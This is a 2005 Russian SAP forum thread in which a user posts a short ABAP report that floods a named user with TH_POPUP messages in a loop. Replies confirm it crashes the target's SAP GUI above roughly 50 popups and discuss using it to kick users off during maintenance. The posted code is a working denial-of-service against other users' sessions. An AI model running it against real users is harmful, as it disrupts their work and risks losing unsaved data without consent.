Текущее время: Чт, июл 31 2025, 17:13

Часовой пояс: UTC + 3 часа


Правила форума


ВНИМАНИЕ!

Вопросы по SAP Query и Quick View - сюда



Начать новую тему Ответить на тему  [ Сообщений: 68 ]  На страницу 1, 2, 3, 4, 5  След.
Автор Сообщение
 Заголовок сообщения: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Чт, окт 06 2005, 11:56 
Старший специалист
Старший специалист

Зарегистрирован:
Пт, ноя 12 2004, 10:44
Сообщения: 370
Откуда: Москва
не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений :) проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит :)

Code:
report z_gui_exploit.

parameters uname type sy-uname obligatory.
parameters text type sm04dic-popupmsg.
parameters times type i default 50.
parameters mandt type sy-mandt default sy-mandt.

start-of-selection.
  do times times.
  call function 'TH_POPUP'
    exporting
      client = mandt
      user = uname
      message = text
    exceptions                                                             
      user_not_found = 1
      others = 2.
  enddo.


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 06 2005, 12:06 
Гуру-модератор
Гуру-модератор
Аватара пользователя

Зарегистрирован:
Пн, окт 11 2004, 20:32
Сообщения: 2470
Пол: Мужской
клево :) 4.0b вылетает так же без вопросов

опаньки... попробовал на себе - вылетает даже не режим, а весь сапгуй падает, успев показать какое то окошко и тут же его закрыв :shock:

_________________
- Может ли настоящий мастер кунг-фу получить по морде?
- Настоящий мастер может все!


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 06 2005, 14:36 
Старший специалист
Старший специалист
Аватара пользователя

Зарегистрирован:
Вт, авг 17 2004, 08:55
Сообщения: 331
Откуда: Украина, г.Мариуполь
Пол: Мужской
Выполнять прогу можно в интерактивном режиме? С какими параметрами? У меня гуя не падает... :( Версия 6.40 патч 11 (или 13).


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 06 2005, 14:47 
Гуру-модератор
Гуру-модератор
Аватара пользователя

Зарегистрирован:
Пн, окт 11 2004, 20:32
Сообщения: 2470
Пол: Мужской
RoadRunner написал:
Выполнять прогу можно в интерактивном режиме? С какими параметрами? У меня гуя не падает... :( Версия 6.40 патч 11 (или 13).

из параметров я ввожу только имя пользователя (свое), версия гуя 6.20

ЗЫ. винда 2к :)

_________________
- Может ли настоящий мастер кунг-фу получить по морде?
- Настоящий мастер может все!


Последний раз редактировалось ArmAnn Пт, окт 07 2005, 09:58, всего редактировалось 1 раз.

Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 06 2005, 15:15 
Младший специалист
Младший специалист

Зарегистрирован:
Пт, окт 15 2004, 13:25
Сообщения: 94
Да, падает, видимо из-за нехватки ресурсов! Наверняка падает только в 9x винде которая страдает такой проблемой.
по крайней мере проверял с times = 50 - закрывается, а если поставить 20 то не падает, и соответственно выдает 20 окошек ....

_________________
Просто я программист ....


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт, окт 07 2005, 11:55 
Менеджер
Менеджер

Зарегистрирован:
Чт, янв 20 2005, 08:34
Сообщения: 573
Пол: Мужской
Цитата:
Да, падает, видимо из-за нехватки ресурсов! Наверняка падает только в 9x винде которая страдает такой проблемой.


На XP тоже падает. При 50.

При 10 не падает.
Точное число не стал искать.

_________________
Волю в кулак, мышцы в узду, работай себе и не ахай!


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Пн, окт 10 2005, 17:17 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
holocron написал(а):
не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений :) проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит :)

Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 06:56 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
holocron написал(а):
не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений :) проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит :)


:lol: :lol: :lol:
Злые вы....... Все-бы юзверю нагадить :twisted:
:D :D :D

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 06:59 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Skif написал:
Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:26 
Гуру-модератор
Гуру-модератор
Аватара пользователя

Зарегистрирован:
Пн, окт 11 2004, 20:32
Сообщения: 2470
Пол: Мужской
vvvictor написал:
Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:


и этот человек кого то назвал злым :lol:

_________________
- Может ли настоящий мастер кунг-фу получить по морде?
- Настоящий мастер может все!


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:31 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
ArmAnn написал:
и этот человек кого то назвал злым :lol:

Сравни один TH_POPUP с предупреждением об отключении с возможностью завершить корректно работу и т.д. А потом просто блокирование все "нежелательных" на время системных работ с последующим автоматическим разблокированием и чистой воды флуд, пока ГУЙ не загнется :D :D :D

Необходимость таких мер я признаю, но вот по поводу инструментария готов поспорить :lol: :lol: :lol:

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:39 
Гость
vvvictor написал:
Skif написал:
Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится


Принять этот ответ
Вернуться к началу
  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:41 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Anonymous написал(а):
vvvictor написал:
Skif написал:
Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится

Я это года два-три назад ваял - если память не изменяет - и выкидывает.....

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:42 
Гость
Anonymous написал(а):
vvvictor написал:
Skif написал:
Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится

погодь..она ж только в текущей инстанции будет пахать? или торможу?


Принять этот ответ
Вернуться к началу
  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:45 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Anonymous написал(а):
погодь..она ж только в текущей инстанции будет пахать? или торможу?

Не помню, но некоторые вещи можно вырулить, например с client specify, если ты речь ведешь про мандант

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 68 ]  На страницу 1, 2, 3, 4, 5  След.

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Русская поддержка phpBB